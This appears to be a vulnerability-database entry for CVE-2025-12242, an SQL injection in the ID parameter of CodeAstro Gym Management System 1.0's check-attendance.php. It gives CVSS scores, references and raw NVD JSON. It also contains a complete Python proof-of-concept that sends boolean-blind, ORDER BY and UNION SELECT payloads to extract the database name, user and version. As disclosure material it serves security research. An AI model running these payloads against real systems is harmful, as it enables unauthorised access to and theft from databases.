CVE-2025-12242

Description

A vulnerability has been found in CodeAstro Gym Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/actions/check-attendance.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-12242 SQL Injection PoC for CodeAstro Gym Management System 1.0
# Target: /admin/actions/check-attendance.php

import requests
import sys
from urllib.parse import urlencode

def exploit_sql_injection(target_url, param_value):
    """Test for SQL injection vulnerability"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    
    # Vulnerable parameter - ID parameter
    data = {
        'ID': param_value
    }
    
    try:
        response = requests.post(
            target_url,
            data=data,
            headers=headers,
            timeout=30,
            verify=False
        )
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def boolean_blind_injection(target_url):
    """Boolean-based blind SQL injection test"""
    # True condition - should return normal response
    true_payload = "1' AND 1=1 -- "
    # False condition - should return different response
    false_payload = "1' AND 1=2 -- "
    
    print("[*] Testing boolean-based blind SQL injection...")
    print(f"[*] True condition payload: {true_payload}")
    print(f"[*] False condition payload: {false_payload}")
    
    resp_true = exploit_sql_injection(target_url, true_payload)
    resp_false = exploit_sql_injection(target_url, false_payload)
    
    if resp_true and resp_false:
        if resp_true.status_code != resp_false.status_code or resp_true.text != resp_false.text:
            print("[+] SQL injection vulnerability confirmed!")
            return True
    
    print("[-] SQL injection test completed")
    return False

def union_based_injection(target_url):
    """Union-based SQL injection test"""
    # Determine number of columns
    for i in range(1, 10):
        payload = f"1' ORDER BY {i} -- "
        resp = exploit_sql_injection(target_url, payload)
        if resp and 'error' in resp.text.lower():
            print(f"[*] Number of columns: {i-1}")
            break
    
    # Union injection to extract database info
    union_payload = "1' UNION SELECT NULL,database(),user(),version() -- "
    print(f"[*] Union payload: {union_payload}")
    resp = exploit_sql_injection(target_url, union_payload)
    
    if resp:
        print(f"[*] Response status: {resp.status_code}")
        print(f"[*] Response length: {len(resp.text)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12242.py <target_url>")
        print("Example: python cve-2025-12242.py http://target.com/admin/actions/check-attendance.php")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print(f"[*] CVE-2025-12242 SQL Injection PoC")
    
    # Test for SQL injection
    boolean_blind_injection(target)
    union_based_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12242
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12242
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12242/
[4] VulDB https://vuldb.com/cve/CVE-2025-12242
[5] https://codeastro.com/
[6] https://github.com/yihaofuweng/cve/issues/54
[7] https://vuldb.com/?ctiid.329913
[8] https://vuldb.com/?id.329913
[9] https://vuldb.com/?submit.673411

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12242", "sourceIdentifier": "[email protected]", "published": "2025-10-27T07:15:40.013", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in CodeAstro Gym Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/actions/check-attendance.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yihaofuweng/cve/issues/54", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329913", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329913", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673411", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}